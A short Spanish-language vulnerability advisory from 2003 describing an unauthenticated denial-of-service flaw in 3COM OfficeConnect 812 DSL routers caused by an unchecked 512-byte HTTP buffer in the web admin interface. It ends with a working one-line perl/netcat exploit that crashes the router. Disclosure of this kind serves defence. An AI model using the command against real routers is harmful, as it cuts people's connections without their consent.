|
Denegación de servicio en routers DSL 3COM
Asunto
Denegación de servicio en routers DSL 3COM
Fecha
21-7-03
Productos afectados
Firmwares afectadas
Descripción
El OfficeConnect es un modelo de router de 3COM que se
proporciona a los usuarios de ADSL en España. Hasta el año 2001 3Com había entregado a
Telefónica más de 100.000 routers de su modelo 812. Este router puede ser reiniciado de una
forma sencilla debido a un fallo en su interfaz de administración web. Debido a que no es
necesario autenticarse para provocar el reinicio del router cualquier usuario de la red
interna puede hacerlo. Se puede explotar remotamente el fallo con un poco de interacción
de un usuario del 3COM, por ejemplo, pulsando un enlace en un foro o visitando un página .
Debido a que el buffer que almacena las peticiones HTTP de la interfaz web de
administración (Allegro RomPager) es de 512 bytes y no se comprueba si la longitud
de la petición supera la longitud del buffer, con mandar 512 bytes o más se provoca un fallo
en el router y un reinicio, perdiéndose la conexión por unos minutos.
Exploit
perl -e 'print "A"x512;print "\n\n\n\n\n"' | netcat -v -n 192.168.0.1 80
Créditos
Esta vulnerabilidad fue descubierta por David F.
Madrid, redactor de Nautopía.
-Vulnerabilidades-
|
